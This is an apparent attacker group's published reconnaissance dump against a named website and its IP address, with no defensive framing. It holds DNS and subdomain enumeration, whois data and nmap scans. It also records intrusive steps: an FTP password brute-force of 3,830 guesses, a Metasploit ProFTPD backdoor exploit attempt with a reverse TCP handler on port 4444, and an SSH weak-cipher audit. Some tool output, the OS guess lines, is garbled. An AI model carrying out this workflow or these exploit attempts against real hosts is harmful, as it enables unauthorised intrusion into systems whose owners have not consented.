HunterUnit JTSEC full Recon Anonymous #2

1. #######################################################################################################################################
2. Hostname cv2.dreamcaster.info ISP Quasi Networks LTD. (AS29073)
3. Continent Africa Flag
4. SC
5. Country Seychelles Country Code SC (SYC)
6. Region Unknown Local time 30 Sep 2017 06:30 +04
7. City Unknown Latitude -4.583
8. IP Address 80.82.69.63 Longitude 55.667
9. #######################################################################################################################################
10. HunterUnit JTSEC full Recon Anonymous #2
11. [i] Scanning Site: http://cv2.dreamcaster.info
12.  
13.  
14.  
15. B A S I C I N F O
16. ====================
17.  
18.  
19. [+] Site Title: CandyViVa - Candid Video Vault - ARCHIVE 2
20. [+] IP address: 80.82.69.63
21. [+] Web Server: Apache/2
22. [+] CMS: Could Not Detect
23. [+] Cloudflare: Not Detected
24. [+] Robots File: Could NOT Find robots.txt!
25.  
26.  
27.  
28. G E O I P L O O K U P
29. =========================
30.  
31. [i] IP Address: 80.82.69.63
32. [i] Country: SC
33. [i] State: N/A
34. [i] City: N/A
35. [i] Latitude: -4.583300
36. [i] Longitude: 55.666698
37.  
38.  
39.  
40.  
41. H T T P H E A D E R S
42. =======================
43.  
44.  
45. [i] HTTP/1.1 200 OK
46. [i] Date: Sat, 30 Sep 2017 02:38:17 GMT
47. [i] Server: Apache/2
48. [i] Last-Modified: Mon, 14 Feb 2011 17:14:43 GMT
49. [i] ETag: "17a3-49c412f0c86c0"
50. [i] Accept-Ranges: bytes
51. [i] Content-Length: 6051
52. [i] Vary: Accept-Encoding,User-Agent
53. [i] Connection: close
54. [i] Content-Type: text/html
55.  
56.  
57.  
58.  
59. D N S L O O K U P
60. ===================
61.  
62. cv2.dreamcaster.info. 14397 IN A 80.82.69.63
63.  
64.  
65.  
66.  
67. S U B N E T C A L C U L A T I O N
68. ====================================
69.  
70. Address = 80.82.69.63
71. Network = 80.82.69.63 / 32
72. Netmask = 255.255.255.255
73. Broadcast = not needed on Point-to-Point links
74. Wildcard Mask = 0.0.0.0
75. Hosts Bits = 0
76. Max. Hosts = 1 (2^0 - 0)
77. Host Range = { 80.82.69.63 - 80.82.69.63 }
78.  
79.  
80.  
81. N M A P P O R T S C A N
82. ============================
83.  
84.  
85. Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-30 02:31 UTC
86. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
87. Host is up (0.083s latency).
88. rDNS record for 80.82.69.63: jademonitor.net
89. PORT STATE SERVICE VERSION
90. 21/tcp open ftp ProFTPD
91. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
92. 23/tcp closed telnet
93. 25/tcp open smtp Exim smtpd 4.84
94. 80/tcp open http?
95. 110/tcp open pop3 Dovecot DirectAdmin pop3d
96. 143/tcp open imap Dovecot imapd
97. 443/tcp open ssl/https?
98. 445/tcp closed microsoft-ds
99. 3389/tcp closed ms-wbt-server
100. 2
101.  
102.  
103.  
104. S U B - D O M A I N F I N D E R
105. ==================================
106.  
107.  
108. [i] Total Subdomains Found : 1
109.  
110. [+] Subdomain: cv2.dreamcaster.info
111. [-] IP: 80.82.69.63
112. [*] Performing TLD Brute force Enumeration against cv2.dreamcaster.info
113. [*] The operation could take up to: 00:01:07
114. [*] A cv2.biz.af 5.45.75.45
115. [*] CNAME cv2.biz.at free.biz.at
116. [*] A free.biz.at 216.92.134.29
117. [*] A cv2.co.asia 91.195.240.135
118. [*] A cv2.com.ax 185.55.85.123
119. [*] A cv2.org.aw 142.4.20.12
120. [*] A cv2.org.ax 185.55.85.123
121. [*] A cv2.co.ba 176.9.45.78
122. [*] A cv2.com.ba 195.222.33.180
123. [*] A cv2.com.be 95.173.170.166
124. [*] A cv2.biz.by 71.18.52.2
125. [*] A cv2.biz.bz 199.59.242.150
126. [*] A cv2.ca 54.225.108.200
127. [*] A cv2.ca 50.19.253.20
128. [*] A cv2.ca 50.17.208.250
129. [*] A cv2.ca 54.225.133.127
130. [*] A cv2.ca 50.17.233.190
131. [*] A cv2.ca 50.16.251.65
132. [*] A cv2.ca 54.197.234.71
133. [*] A cv2.ca 50.19.107.142
134. [*] A cv2.com.cc 54.252.107.64
135. [*] A cv2.net.cc 54.252.89.206
136. [*] A cv2.co.cc 175.126.123.219
137. [*] A cv2.org.ch 72.52.4.122
138. [*] A cv2.cl 192.186.207.228
139. [*] A cv2.co.cm 85.25.140.105
140. [*] A cv2.net.cm 85.25.140.105
141. [*] A cv2.biz.cl 185.53.178.8
142. [*] A cv2.co 50.63.202.1
143. [*] CNAME cv2.biz.cm i.cns.cm
144. [*] A i.cns.cm 118.184.56.30
145. [*] A cv2.com 208.53.48.42
146. [*] A cv2.com.com 52.33.196.199
147. [*] A cv2.net.com 199.59.242.150
148. [*] A cv2.co.com 173.192.115.17
149. [*] A cv2.org.com 23.23.86.44
150. [*] A cv2.biz.cr 72.52.4.122
151. [*] A cv2.biz.cx 72.52.4.122
152. [*] A cv2.net.cz 80.250.24.177
153. [*] A cv2.cz 46.28.105.2
154. [*] AAAA cv2.cz 2a02:2b88:1:4::16
155. [*] A cv2.biz.cz 185.53.179.7
156. [*] A cv2.com.cz 62.109.128.30
157. [*] A cv2.com.de 50.56.68.37
158. [*] CNAME cv2.co.de co.de
159. [*] A co.de 144.76.162.245
160. [*] CNAME cv2.org.de www.org.de
161. [*] A www.org.de 78.47.128.8
162. [*] A cv2.de 178.77.101.205
163. [*] A cv2.dk 81.95.242.59
164. [*] A cv2.net.eu 78.46.90.98
165. [*] A cv2.org.eu 78.46.90.98
166. [*] A cv2.fi 84.234.64.240
167. [*] A cv2.biz.fi 185.55.85.123
168. [*] CNAME cv2.com.fi dnspod-vip3.mydnspod.net
169. [*] A dnspod-vip3.mydnspod.net 119.28.48.237
170. [*] A dnspod-vip3.mydnspod.net 119.28.48.218
171. [*] A cv2.fm 173.230.131.38
172. [*] A cv2.biz.fm 173.230.131.38
173. [*] A cv2.org.fr 149.202.133.35
174. [*] A cv2.biz.gl 72.52.4.122
175. [*] CNAME cv2.co.gp co.gp
176. [*] A co.gp 144.76.162.245
177. [*] A cv2.co.hn 208.100.40.203
178. [*] CNAME cv2.net.hr net.hr
179. [*] A net.hr 192.0.78.25
180. [*] A net.hr 192.0.78.24
181. [*] A cv2.co.ht 72.52.4.122
182. [*] A cv2.id 203.119.112.50
183. [*] CNAME cv2.biz.hn parkmydomain.vhostgo.com
184. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
185. [*] A westuser.dopa.com 107.186.245.119
186. [*] A cv2.im 173.236.27.43
187. [*] A cv2.in 162.215.252.78
188. [*] A cv2.info 212.227.247.14
189. [*] AAAA cv2.info 2001:8d8:1001:6009:74f9:75be:dbb6:a000
190. [*] A cv2.io 64.68.200.44
191. [*] A cv2.ir 77.238.121.16
192. [*] A cv2.it 185.19.185.41
193. [*] A cv2.co.jobs 50.17.193.222
194. [*] A cv2.com.jobs 50.19.241.165
195. [*] A cv2.net.jobs 50.19.241.165
196. [*] A cv2.biz.jobs 50.19.241.165
197. [*] A cv2.org.jobs 50.19.241.165
198. [*] A cv2.biz.ky 199.184.144.27
199. [*] A cv2.la 173.230.141.80
200. [*] CNAME cv2.biz.li 712936.parkingcrew.net
201. [*] A 712936.parkingcrew.net 185.53.179.29
202. [*] A cv2.biz.lu 195.26.5.2
203. [*] A cv2.biz.ly 64.136.20.39
204. [*] A cv2.biz.md 72.52.4.122
205. [*] A cv2.co.mk 87.76.31.211
206. [*] A cv2.co.mobi 54.225.105.179
207. [*] A cv2.com.my 103.1.148.33
208. [*] A cv2.biz.my 202.190.174.44
209. [*] A cv2.net 84.234.64.242
210. [*] A cv2.net.net 52.50.81.210
211. [*] A cv2.co.net 188.166.216.219
212. [*] A cv2.org.net 23.23.86.44
213. [*] A cv2.nl 72.52.4.119
214. [*] A cv2.co.nl 37.97.184.204
215. [*] A cv2.com.nl 83.98.157.102
216. [*] A cv2.net.nl 83.98.157.102
217. [*] A cv2.no 31.24.135.1
218. [*] CNAME cv2.co.nu co.nu
219. [*] A co.nu 144.76.162.245
220. [*] CNAME cv2.com.nu com.nu
221. [*] A com.nu 144.76.162.245
222. [*] A cv2.org.nu 80.92.84.139
223. [*] A cv2.co.nr 208.100.40.202
224. [*] A cv2.net.nu 199.102.76.78
225. [*] CNAME cv2.net.org pewtrusts.org
226. [*] A pewtrusts.org 204.74.99.100
227. [*] A cv2.org 136.243.2.69
228. [*] A cv2.com.org 23.23.86.44
229. [*] A cv2.co.nz 203.96.152.10
230. [*] A cv2.ph 45.79.222.138
231. [*] A cv2.co.ph 45.79.222.138
232. [*] A cv2.com.ph 45.79.222.138
233. [*] A cv2.net.ph 45.79.222.138
234. [*] A cv2.org.ph 45.79.222.138
235. [*] A cv2.org.pm 208.73.210.217
236. [*] A cv2.org.pm 208.73.211.177
237. [*] A cv2.org.pm 208.73.211.165
238. [*] A cv2.org.pm 208.73.210.202
239. [*] A cv2.co.pl 212.91.6.55
240. [*] A cv2.co.ps 66.96.132.56
241. [*] CNAME cv2.biz.ps biz.ps
242. [*] A biz.ps 144.76.162.245
243. [*] A cv2.pw 141.8.226.58
244. [*] A cv2.co.pt 194.107.127.52
245. [*] A cv2.net.pw 141.8.226.59
246. [*] A cv2.co.pw 141.8.226.59
247. [*] A cv2.biz.pw 141.8.226.59
248. [*] A cv2.org.pw 141.8.226.59
249. [*] A cv2.org.re 217.70.184.38
250. [*] A cv2.net.ro 69.64.52.127
251. [*] CNAME cv2.co.ro now.co.ro
252. [*] A now.co.ro 185.27.255.9
253. [*] A cv2.com.ru 178.210.89.119
254. [*] A cv2.biz.se 185.53.179.6
255. [*] A cv2.se 194.30.169.60
256. [*] CNAME cv2.net.se 773147.parkingcrew.net
257. [*] A 773147.parkingcrew.net 185.53.179.29
258. [*] A cv2.co.sl 91.195.240.135
259. [*] A cv2.com.sr 143.95.106.249
260. [*] A cv2.co.su 72.52.4.122
261. [*] A cv2.biz.st 91.121.28.115
262. [*] A cv2.su 91.218.115.152
263. [*] A cv2.biz.tc 64.136.20.39
264. [*] A cv2.biz.tf 85.236.153.18
265. [*] A cv2.net.tf 188.40.70.29
266. [*] A cv2.net.tf 188.40.117.12
267. [*] A cv2.net.tf 188.40.70.27
268. [*] A cv2.co.tl 208.100.40.202
269. [*] A cv2.co.to 175.118.124.44
270. [*] A cv2.co.tv 31.186.25.163
271. [*] A cv2.biz.tv 72.52.4.122
272. [*] A cv2.org.tv 72.52.4.122
273. [*] A cv2.co.uk 109.239.101.52
274. [*] CNAME cv2.biz.uz biz.uz
275. [*] A biz.uz 144.76.162.245
276. [*] A cv2.vg 88.198.29.97
277. [*] A cv2.co.vg 88.198.29.97
278. [*] A cv2.com.vg 88.198.29.97
279. [*] A cv2.net.vg 68.178.254.180
280. [*] A cv2.biz.vg 89.31.143.20
281. [*] A cv2.ws 64.70.19.203
282. [*] A cv2.com.ws 202.4.48.211
283. [*] A cv2.net.ws 202.4.48.211
284. [*] A cv2.org.ws 202.4.48.211
285. [*] A cv2.biz.ws 184.168.221.104
286. % The objects are in RPSL format.
287. %
288. % The RIPE Database is subject to Terms and Conditions.
289. % See http://www.ripe.net/db/support/db-terms-conditions.pdf
290.  
291. % Note: this output has been filtered.
292. % To receive output for a database update, use the "-B" flag.
293.  
294. % Information related to '80.82.69.0 - 80.82.69.255'
295.  
296. % Abuse contact for '80.82.69.0 - 80.82.69.255' is 'abuse@quasinetworks.com'
297.  
298. inetnum: 80.82.69.0 - 80.82.69.255
299. netname: SC-QUASI75
300. descr: QUASI
301. country: SC
302. org: ORG-QNL3-RIPE
303. admin-c: QNL1-RIPE
304. tech-c: QNL1-RIPE
305. status: ASSIGNED PA
306. mnt-by: QUASINETWORKS-MNT
307. mnt-lower: QUASINETWORKS-MNT
308. mnt-routes: QUASINETWORKS-MNT
309. created: 2016-01-23T22:52:22Z
310. last-modified: 2016-01-23T22:52:22Z
311. source: RIPE
312.  
313. organisation: ORG-QNL3-RIPE
314. org-name: Quasi Networks LTD.
315. org-type: OTHER
316. address: Suite 1, Second Floor
317. address: Sound & Vision House, Francis Rachel Street
318. address: Victoria, Mahe, SEYCHELLES
319. remarks: *****************************************************************************
320. remarks: IMPORTANT INFORMATION
321. remarks: *****************************************************************************
322. remarks: We are a high bandwidth network provider offering bandwidth solutions.
323. remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
324. remarks: Please only use abuse@quasinetworks.com for abuse reports.
325. remarks: For all other requests, please see the details on our website.
326. remarks: *****************************************************************************
327. abuse-mailbox: abuse@quasinetworks.com
328. abuse-c: AR34302-RIPE
329. mnt-ref: QUASINETWORKS-MNT
330. mnt-by: QUASINETWORKS-MNT
331. created: 2015-11-08T22:25:26Z
332. last-modified: 2015-11-27T09:37:50Z
333. source: RIPE # Filtered
334.  
335. role: Quasi Networks LTD
336. address: Suite 1, Second Floor
337. address: Sound & Vision House, Francis Rachel Street
338. address: Victoria, Mahe, SEYCHELLES
339. remarks: *****************************************************************************
340. remarks: IMPORTANT INFORMATION
341. remarks: *****************************************************************************
342. remarks: We are a high bandwidth network provider offering bandwidth solutions.
343. remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
344. remarks: Please only use abuse@quasinetworks.com for abuse reports.
345. remarks: For all other requests, please see the details on our website.
346. remarks: *****************************************************************************
347. abuse-mailbox: abuse@quasinetworks.com
348. nic-hdl: QNL1-RIPE
349. mnt-by: QUASINETWORKS-MNT
350. created: 2015-11-07T22:43:04Z
351. last-modified: 2015-11-07T23:04:49Z
352. source: RIPE # Filtered
353.  
354. % Information related to '80.82.69.0/24AS29073'
355.  
356. route: 80.82.69.0/24
357. descr: Quasi Networks LTD (IBC)
358. origin: AS29073
359. mnt-by: QUASINETWORKS-MNT
360. created: 2010-11-30T12:05:14Z
361. last-modified: 2016-01-23T22:52:39Z
362. source: RIPE
363.  
364. % This query was served by the RIPE Database Query Service version 1.89.2 (HEREFORD)
365. + -- --=[http://crowdshield.com
366. + -- --=[sniper v2.8 by 1N3
367.  
368. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
369. Server: 192.168.1.254
370. Address: 192.168.1.254#53
371.  
372. Non-authoritative answer:
373. Name: cv2.dreamcaster.info
374. Address: 80.82.69.63
375.  
376. cv2.dreamcaster.info has address 80.82.69.63
377. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
378.  
379. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
380.  
381. [+] Target is cv2.dreamcaster.info
382. [+] Loading modules.
383. [+] Following modules are loaded:
384. [x] [1] ping:icmp_ping - ICMP echo discovery module
385. [x] [2] ping:tcp_ping - TCP-based ping discovery module
386. [x] [3] ping:udp_ping - UDP-based ping discovery module
387. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
388. [x] [5] infogather:portscan - TCP and UDP PortScanner
389. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
390. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
391. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
392. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
393. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
394. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
395. [x] [12] fingerprint:smb - SMB fingerprinting module
396. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
397. [+] 13 modules registered
398. [+] Initializing scan engine
399. [+] Running scan engine
400. [-] ping:tcp_ping module: no closed/open TCP ports known on 80.82.69.63. Module test failed
401. [-] ping:udp_ping module: no closed/open UDP ports known on 80.82.69.63. Module test failed
402. [-] No distance calculation. 80.82.69.63 appears to be dead or no ports known
403. [+] Host: 80.82.69.63 is up (Guess probability: 50%)
404. [+] Target: 80.82.69.63 is alive. Round-Trip Time: 0.49563 sec
405. [+] Selected safe Round-Trip Time value is: 0.99126 sec
406. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
407. [-] fingerprint:smb need either TCP port 139 or 445 to run
408. [-] fingerprint:snmp: need UDP port 161 open
409. [+] Primary guess:
410. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
411. [+] Other guesses:
412. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
413. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
414. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
415. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
416. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
417. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
418. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
419. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
420. [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
421. [+] Cleaning up scan engine
422. [+] Modules deinitialized
423. [+] Execution completed.
424. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
425. NOT FOUND
426. >>> Last update of WHOIS database: 2017-09-30T02:31:02Z <<<
427.  
428. Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
429. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
430.  
431. *******************************************************************
432. * *
433. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
434. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
435. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
436. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
437. * *
438. * TheHarvester Ver. 2.7 *
439. * Coded by Christian Martorella *
440. * Edge-Security Research *
441. * cmartorella@edge-security.com *
442. *******************************************************************
443.  
444.  
445. [-] Searching in Bing:
446. Searching 50 results...
447. Searching 100 results...
448.  
449.  
450. [+] Emails found:
451. ------------------
452. No emails found
453.  
454. [+] Hosts found in search engines:
455. ------------------------------------
456. [-] Resolving hostnames IPs...
457. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
458.  
459. ; <<>> DiG 9.10.3-P4-Debian <<>> -x cv2.dreamcaster.info
460. ;; global options: +cmd
461. ;; Got answer:
462. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14401
463. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
464.  
465. ;; OPT PSEUDOSECTION:
466. ; EDNS: version: 0, flags:; udp: 4096
467. ;; QUESTION SECTION:
468. ;info.dreamcaster.cv2.in-addr.arpa. IN PTR
469.  
470. ;; AUTHORITY SECTION:
471. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043204 1800 900 604800 3600
472.  
473. ;; Query time: 35 msec
474. ;; SERVER: 192.168.1.254#53(192.168.1.254)
475. ;; WHEN: Fri Sep 29 22:32:18 EDT 2017
476. ;; MSG SIZE rcvd: 130
477.  
478. Smartmatch is experimental at /usr/bin/dnsenum line 698.
479. Smartmatch is experimental at /usr/bin/dnsenum line 698.
480. dnsenum VERSION:1.2.4
481.  
482. ----- cv2.dreamcaster.info -----
483.  
484.  
485. Host's addresses:
486. __________________
487.  
488. cv2.dreamcaster.info. 14271 IN A 80.82.69.63
489.  
490.  
491. Name Servers:
492. ______________
493.  
494. cv2.dreamcaster.info NS record query failed: NOERROR
495. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
496.  
497. ____ _ _ _ _ _____
498. / ___| _ _| |__ | (_)___| |_|___ / _ __
499. \___ \| | | | '_ \| | / __| __| |_ \| '__|
500. ___) | |_| | |_) | | \__ \ |_ ___) | |
501. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
502.  
503. # Coded By Ahmed Aboul-Ela - @aboul3la
504.  
505. [-] Enumerating subdomains now for cv2.dreamcaster.info
506. [-] verbosity is enabled, will show the subdomains results in realtime
507. [-] Searching now in Baidu..
508. [-] Searching now in Yahoo..
509. [-] Searching now in Google..
510. [-] Searching now in Bing..
511. [-] Searching now in Ask..
512. [-] Searching now in Netcraft..
513. [-] Searching now in DNSdumpster..
514. [-] Searching now in Virustotal..
515. [-] Searching now in ThreatCrowd..
516. [-] Searching now in SSL Certificates..
517. [-] Searching now in PassiveDNS..
518.  
519. ╔═╗╦═╗╔╦╗╔═╗╦ ╦
520. ║ ╠╦╝ ║ ╚═╗╠═╣
521. ╚═╝╩╚═ ╩o╚═╝╩ ╩
522. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
523.  
524. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-cv2.dreamcaster.info-full.txt
525.  
526. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
527. + -- ----------------------------=[Checking Email Security]=----------------- -- +
528.  
529. + -- ----------------------------=[Pinging host]=---------------------------- -- +
530. PING cv2.dreamcaster.info (80.82.69.63) 56(84) bytes of data.
531. 64 bytes from jademonitor.net (80.82.69.63): icmp_seq=1 ttl=58 time=121 ms
532.  
533. --- cv2.dreamcaster.info ping statistics ---
534. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
535. rtt min/avg/max/mdev = 121.488/121.488/121.488/0.000 ms
536.  
537. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
538.  
539. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:32 EDT
540. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
541. Host is up (0.13s latency).
542. rDNS record for 80.82.69.63: jademonitor.net
543. Not shown: 454 closed ports, 8 filtered ports
544. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
545. PORT STATE SERVICE
546. 21/tcp open ftp
547. 22/tcp open ssh
548. 53/tcp open domain
549. 80/tcp open http
550. 110/tcp open pop3
551. 143/tcp open imap
552. 443/tcp open https
553. 993/tcp open imaps
554. 995/tcp open pop3s
555. 2222/tcp open EtherNetIP-1
556. 3306/tcp open mysql
557.  
558. Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
559.  
560. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
561. + -- --=[Port 21 opened... running tests...
562.  
563. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:32 EDT
564. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
565. Host is up (0.12s latency).
566. rDNS record for 80.82.69.63: jademonitor.net
567.  
568. PORT STATE SERVICE VERSION
569. 21/tcp open ftp ProFTPD
570. | ftp-brute:
571. | Accounts: No valid accounts found
572. |_ Statistics: Performed 3830 guesses in 180 seconds, average tps: 21.3
573. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
574. Aggressive OS guesses: Linux 2.6.39 (99%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), Linux 3.4 (94%), WatchGuard Fireware 11.8 (94%), Synology DiskStation Manager 5.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.10 (94%), Linux 3.1 - 3.2 (93%), Linux 2.6.32 - 2.6.39 (92%)
575. No exact OS matches for host (test conditions non-ideal).
576. Network Distance: 10 hops
577. Service Info: OS: Unix
578.  
579. TRACEROUTE (using port 21/tcp)
580. HOP RTT ADDRESS
581. 1 111.54 ms 10.13.0.1
582. 2 110.93 ms 37.187.24.252
583. 3 111.45 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
584. 4 ...
585. 5 120.52 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
586. 6 ...
587. 7 125.83 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
588. 8 121.86 ms 176.10.83.119
589. 9 ...
590. 10 121.88 ms jademonitor.net (80.82.69.63)
591.  
592. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
593. Nmap done: 1 IP address (1 host up) scanned in 195.70 seconds
594.  
595. , ,
596. / \
597. ((__---,,,---__))
598. (_) O O (_)_________
599. \ _ / |\
600. o_o \ M S F | \
601. \ _____ | *
602. ||| WW|||
603. ||| |||
604.  
605.  
606. =[ metasploit v4.16.8-dev ]
607. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
608. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
609. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
610.  
611. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
612. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
613. [-] Unknown command: “spool.
614. RHOST => cv2.dreamcaster.info
615. RHOSTS => cv2.dreamcaster.info
616. [*] cv2.dreamcaster.info:21 - Banner: 220 ProFTPD Server ready.
617. [*] cv2.dreamcaster.info:21 - USER: 331 Password required for UHYZa3:)
618. [*] Exploit completed, but no session was created.
619. [*] Started reverse TCP double handler on 10.13.0.22:4444
620. [*] cv2.dreamcaster.info:21 - Sending Backdoor Command
621. [-] cv2.dreamcaster.info:21 - Not backdoored
622. [*] Exploit completed, but no session was created.
623. + -- --=[Port 22 opened... running tests...
624. # general
625. (gen) banner: SSH-2.0-OpenSSH_5.3
626. (gen) software: OpenSSH 5.3
627. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
628. (gen) compression: enabled (zlib@openssh.com)
629.  
630. # key exchange algorithms
631. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
632. `- [info] available since OpenSSH 4.4
633. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
634. `- [warn] using weak hashing algorithm
635. `- [info] available since OpenSSH 2.3.0
636. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
637. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
638. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
639. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
640. `- [warn] using small 1024-bit modulus
641. `- [warn] using weak hashing algorithm
642. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
643.  
644. # host-key algorithms
645. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
646. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
647. `- [warn] using small 1024-bit modulus
648. `- [warn] using weak random number generator could reveal the key
649. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
650.  
651. # encryption algorithms (ciphers)
652. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
653. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
654. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
655. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
656. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
657. `- [warn] using weak cipher
658. `- [info] available since OpenSSH 4.2
659. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
660. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
661. `- [warn] using weak cipher
662. `- [info] available since OpenSSH 4.2
663. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
664. `- [warn] using weak cipher mode
665. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
666. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
667. `- [warn] using weak cipher
668. `- [warn] using weak cipher mode
669. `- [warn] using small 64-bit block size
670. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
671. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
672. `- [fail] disabled since Dropbear SSH 0.53
673. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
674. `- [warn] using weak cipher mode
675. `- [warn] using small 64-bit block size
676. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
677. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
678. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
679. `- [warn] using weak cipher mode
680. `- [warn] using small 64-bit block size
681. `- [info] available since OpenSSH 2.1.0
682. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
683. `- [warn] using weak cipher mode
684. `- [info] available since OpenSSH 2.3.0
685. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
686. `- [warn] using weak cipher mode
687. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
688. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
689. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
690. `- [warn] using weak cipher
691. `- [info] available since OpenSSH 2.1.0
692. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
693. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
694. `- [warn] using weak cipher mode
695. `- [info] available since OpenSSH 2.3.0
696.  
697. # message authentication code algorithms
